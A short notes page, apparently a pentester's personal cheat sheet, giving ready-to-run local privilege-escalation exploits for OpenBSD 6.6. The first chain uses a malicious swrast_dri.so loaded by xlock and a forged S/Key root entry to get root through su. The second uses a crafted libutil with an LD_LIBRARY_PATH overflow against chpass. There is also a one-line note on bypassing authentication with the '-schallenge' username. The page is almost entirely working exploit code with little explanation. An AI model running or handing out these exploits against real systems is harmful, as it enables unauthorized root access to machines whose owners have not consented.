xct's notes
Search…
OpenBSD
Works in OpenBSD 6.6.
1
cat > swrast_dri.c << "EOF"
2
#include <paths.h>
3
#include <sys/types.h>
4
#include <unistd.h>
5
6
static void __attribute__ ((constructor)) _init (void) {
7
gid_t rgid, egid, sgid;
8
if (getresgid(&rgid, &egid, &sgid) != 0) _exit(__LINE__);
9
if (setresgid(sgid, sgid, sgid) != 0) _exit(__LINE__);
10
11
char * const argv[] = { _PATH_KSHELL, NULL };
12
execve(argv[0], argv, NULL);
13
_exit(__LINE__);
14
}
15
EOF
16
gcc -fpic -shared -s -o swrast_dri.so swrast_dri.c
17
env -i /usr/X11R6/bin/Xvfb :82 -cc 0 &
18
env -i LIBGL_DRIVERS_PATH=. /usr/X11R6/bin/xlock -display :82
19
echo 'root md5 0100 obsd91335 8b6d96e0ef1b1c21' > /etc/skey/root
20
chmod 0600 /etc/skey/root
21
env -i TERM=vt220 su -l -a skey
22
EGG LARD GROW HOG DRAG LAIN
23
id
Copied!
If login_passwd is used we can provide the username -schallenge to bypass authentication.
Works on OpenBSD 6.6.
1
cd /tmp
2
cat > lib.c << "EOF"
3
#include <paths.h>
4
#include <unistd.h>
5
6
static void __attribute__ ((constructor)) _init (void) {
7
if (setuid(0) != 0) _exit(__LINE__);
8
if (setgid(0) != 0) _exit(__LINE__);
9
char * const argv[] = { _PATH_KSHELL, "-c", _PATH_KSHELL "; exit 1", NULL };
10
execve(argv[0], argv, NULL);
11
_exit(__LINE__);
12
}
13
EOF
14
15
gcc -fpic -shared -s -o libutil.so.13.1 lib.c
16
17
cat > poc.c << "EOF"
18
#include <string.h>
19
#include <sys/param.h>
20
#include <sys/resource.h>
21
#include <unistd.h>
22
23
int
24
main(int argc, char * const * argv)
25
{
26
#define LLP "LD_LIBRARY_PATH=."
27
static char llp[ARG_MAX - 128];
28
memset(llp, ':', sizeof(llp)-1);
29
memcpy(llp, LLP, sizeof(LLP)-1);
30
char * const envp[] = { llp, "EDITOR=echo '#' >>", NULL };
31
32
#define DATA (ARG_MAX * sizeof(char *))
33
const struct rlimit data = { DATA, DATA };
34
if (setrlimit(RLIMIT_DATA, &data) != 0) _exit(__LINE__);
35
36
if (argc <= 1) _exit(__LINE__);
37
argv += 1;
38
execve(argv[0], argv, envp);
39
_exit(__LINE__);
40
}
41
EOF
42
gcc -s -o poc poc.c
43
./poc /usr/bin/chpass
Copied!
Last modified 1yr ago